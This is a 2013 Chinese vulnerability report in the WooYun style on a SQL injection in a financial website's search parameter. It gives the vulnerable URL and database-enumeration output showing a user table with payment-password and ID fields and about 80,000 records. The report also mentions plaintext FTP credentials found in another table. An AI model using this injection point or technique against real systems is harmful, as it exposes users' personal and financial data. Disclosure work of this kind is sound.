漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2013-08-20: 细节已通知厂商并且等待厂商处理中
2013-08-24: 厂商已经确认,细节仅向厂商公开
2013-09-03: 细节向核心白帽子及相关领域专家公开
2013-09-13: 细节向普通白帽子公开
2013-09-23: 细节向实习白帽子公开
2013-10-04: 细节向公众公开
简要描述:
数银在线网站存在SQL注入,可脱裤。
详细说明:
网站搜索功能未对用户输入进行检查,导致SQL注入:
http://s.6677bank.com/shuyin/searchPage.do?tagType=1&tagStr=%27
漏洞证明:
数据库里面东西不少(140个表),拉一个包含用户信息表字段:
Database: sycms_new
Table: iw_user
[33 columns]
+---------------------+---------------+
| Column | Type |
+---------------------+---------------+
| admin_id | int(11) |
| adress | varchar(256) |
| agenter_id | varchar(16) |
| cell | varchar(16) |
| cert_no | varchar(32) |
| cert_type | varchar(20) |
| check_cert | char(1) |
| check_phone | char(1) |
| city | varchar(32) |
| create_dt | timestamp |
| defined_login_type | tinyint(4) |
| email | varchar(32) |
| enabled_status | char(1) |
| firm_name | varchar(128) |
| gender | varchar(4) |
| iw_user_id | varchar(32) |
| last_login_ip | varchar(16) |
| last_login_time | timestamp |
| login_fail_quantity | int(11) |
| login_quantity | int(11) |
| memo | varchar(256) |
| pay_password | varchar(32) |
| phone | varchar(16) |
| photoName | varchar(256) |
| province | varchar(32) |
| real_name | varchar(128) |
| update_dt | timestamp |
| user_actkey | varchar(32) |
| user_name | varchar(32) |
| user_points | decimal(15,0) |
| user_source | varchar(20) |
| user_type | tinyint(4) |
| zipcode | varchar(10) |
+---------------------+---------------+
具体用户信息不列了。
Database: sycms_new
+---------+---------+
| Table | Entries |
+---------+---------+
| iw_user | 79432 |
+---------+---------+
接近8万条用户记录
另外,某个表中还包含了某台服务器ftp明文账号密码。
没进一步挖了。
修复方案:
对相关参数进行检查。
版权声明:转载请注明来源 springold@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2013-08-24 22:42
厂商回复:
最新状态:
暂无